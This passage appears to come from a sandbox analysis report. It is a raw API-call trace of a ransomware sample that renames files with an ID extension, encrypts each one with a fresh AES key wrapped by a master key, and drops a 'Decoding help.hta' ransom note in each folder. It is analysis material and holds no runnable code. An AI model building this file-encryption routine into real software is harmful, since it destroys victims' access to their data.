pbData=0x25b0000*, pdwDataLen=0xce0fce4*=0x480) returned 1 [0047.028] UnmapViewOfFile (lpBaseAddress=0x25b0000) returned 1 [0047.029] CloseHandle (hObject=0x698) returned 1 [0047.029] CryptDestroyKey (hKey=0x5d8690) returned 1 [0047.029] CryptReleaseContext (hProv=0x344a128, dwFlags=0x0) returned 1 [0047.029] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.029] WriteFile (in: hFile=0x3e8, lpBuffer=0xce0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xce0fbe4*, lpNumberOfBytesWritten=0xce0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.365] WriteFile (in: hFile=0x3e8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xce0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.366] CloseHandle (hObject=0x3e8) returned 1 [0050.366] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.649] FindNextFileW (in: hFindFile=0x5a5970, lpFindFileData=0xce0fd30 | out: lpFindFileData=0xce0fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0053.649] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0053.649] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0053.650] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" [0053.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\decoding help.hta")) returned 0x1 [0053.650] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0053.650] lstrlenW (lpString="desktop.ini") returned 11 [0053.650] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0053.650] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0053.650] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" [0053.650] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" [0053.650] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0053.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0056.455] CreateFileMappingA (hFile=0x554, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c8 [0056.455] CryptAcquireContextA (in: phProv=0xce0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0fcec*=0x3448f18) returned 1 [0059.913] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0xce0fce8 | out: phKey=0xce0fce8*=0x5da238) returned 1 [0059.913] CryptExportKey (in: hKey=0x5da238, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xce0fbe4, pdwDataLen=0xce0fce4 | out: pbData=0xce0fbe4*, pdwDataLen=0xce0fce4*=0x2c) returned 1 [0059.913] MapViewOfFile (hFileMappingObject=0x3c8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180) returned 0x2d0000 [0059.915] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xce0fbe4*, pdwDataLen=0xce0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xce0fbe4*, pdwDataLen=0xce0fcf8*=0x100) returned 1 [0059.916] CryptEncrypt (in: hKey=0x5da238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xce0fce4*=0x180, dwBufLen=0x180 | out: pbData=0x2d0000*, pdwDataLen=0xce0fce4*=0x180) returned 1 [0059.916] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0059.917] CloseHandle (hObject=0x3c8) returned 1 [0059.917] CryptDestroyKey (hKey=0x5da238) returned 1 [0059.917] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0059.918] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.918] WriteFile (in: hFile=0x554, lpBuffer=0xce0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xce0fbe4*, lpNumberOfBytesWritten=0xce0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.322] WriteFile (in: hFile=0x554, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xce0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.322] CloseHandle (hObject=0x554) returned 1 [0061.322] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.323] FindNextFileW (in: hFindFile=0x5a5970, lpFindFileData=0xce0fd30 | out: lpFindFileData=0xce0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0061.323] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0061.323] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0061.323] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" [0061.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\decoding help.hta")) returned 0x1 [0061.323] lstrcmpiW (lpString1="Decoding help.hta", lpString2="lulcit amkdfe.contact") returned -1 [0061.323] lstrlenW (lpString="lulcit amkdfe.contact") returned 21 [0061.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0061.323] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0061.323] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="lulcit amkdfe.contact" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" [0061.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" [0061.323] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.[ID]g9uZrLhJaygpwRm1[ID]" [0061.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xad0 [0061.989] CreateFileMappingA (hFile=0xad0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xad4 [0061.989] CryptAcquireContextA (phProv=0xce0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 157 os_tid = 0x7a0 [0040.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\*.*", lpFindFileData=0xcf4fd30 | out: lpFindFileData=0xcf4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3eb50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xebb910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xebb910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7d90 [0041.899] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.900] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0xcf4fd30 | out: lpFindFileData=0xcf4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3eb50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xebb910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xebb910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.900] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.900] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.900] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0xcf4fd30 | out: lpFindFileData=0xcf4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebb910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21c6910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21c6910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0041.900] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0041.900] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0041.900] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0041.902] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\*.*" [0041.902] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\*.*") returned 52 [0041.902] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033" [0041.902] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*" [0041.902] GlobalMemoryStatus (in: lpBuffer=0xcf4fd10 | out: lpBuffer=0xcf4fd10) [0041.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1140ceb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0041.903] CloseHandle (hObject=0x49c) returned 1 [0041.903] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0xcf4fd30 | out: lpFindFileData=0xcf4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebb910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21c6910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21c6910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0041.903] FindClose (in: hFindFile=0x5d7d90 | out: hFindFile=0x5d7d90) returned 1 Thread: id = 158 os_tid = 0x488 [0040.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*", lpFindFileData=0xd08fd30 | out: lpFindFileData=0xd08fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7f90 [0040.765] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.766] FindNextFileW (in: hFindFile=0x5d7f90, lpFindFileData=0xd08fd30 | out: lpFindFileData=0xd08fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.766] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.766] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.766] FindNextFileW (in: hFindFile=0x5d7f90, lpFindFileData=0xd08fd30 | out: lpFindFileData=0xd08fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0040.766] lstrcmpW (lpString1=".", lpString2="Desktop") returned -1 [0040.766] lstrcmpW (lpString1="..", lpString2="Desktop") returned -1 [0040.766] lstrcmpiW (lpString1="windows", lpString2="Desktop") returned 1 [0041.156] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" [0041.156] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned 66 [0041.156] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="Desktop" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop" [0041.156] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*.*" [0041.156] GlobalMemoryStatus (in: lpBuffer=0xd08fd10 | out: lpBuffer=0xd08fd10) [0041.156] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95e1c80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x318 [0041.160] CloseHandle (hObject=0x318) returned 1 [0041.160] FindNextFileW (in: hFindFile=0x5d7f90, lpFindFileData=0xd08fd30 | out: lpFindFileData=0xd08fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x8b840, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceca35.dll", cAlternateFileName="SQLCEC~1.DLL")) returned 1 [0041.160] lstrcpyW (in: lpString1=0x4238660, lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" [0041.160] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned 66 [0041.160] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta" [0041.160] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\decoding help.hta")) returned 0xffffffff [0041.160] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0041.160] WriteFile (in: hFile=0x318, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xd08fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xd08fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.161] CloseHandle (hObject=0x318) returned 1 [0041.161] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.162] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqlceca35.dll") returned -1 [0041.162] lstrlenW (lpString="sqlceca35.dll") returned 13 [0041.162] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" [0041.162] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned 66 [0041.162] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="sqlceca35.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll" [0041.162] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll" [0041.162] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0041.162] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlceca35.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlceca35.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.166] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlceca35.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0041.166] CreateFileMappingA (hFile=0x3a4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3a8 [0041.166] CryptAcquireContextA (in: phProv=0xd08fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd08fcec*=0x3449028) returned 1 [0043.724] CryptGenKey (in: hProv=0x3449028, Algid=0x6610, dwFlags=0x1, phKey=0xd08fce8 | out: phKey=0xd08fce8*=0x5d8510) returned 1 [0043.724] CryptExportKey (in: hKey=0x5d8510, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xd08fbe4, pdwDataLen=0xd08fce4 | out: pbData=0xd08fbe4*, pdwDataLen=0xd08fce4*=0x2c) returned 1 [0043.724] MapViewOfFile (hFileMappingObject=0x3a8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8b840) returned 0x4910000 [0043.750] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xd08fbe4*, pdwDataLen=0xd08fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xd08fbe4*, pdwDataLen=0xd08fcf8*=0x100) returned 1 [0043.751] CryptEncrypt (in: hKey=0x5d8510, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4910000, pdwDataLen=0xd08fce4*=0x8b840, dwBufLen=0x8b840 | out: pbData=0x4910000*, 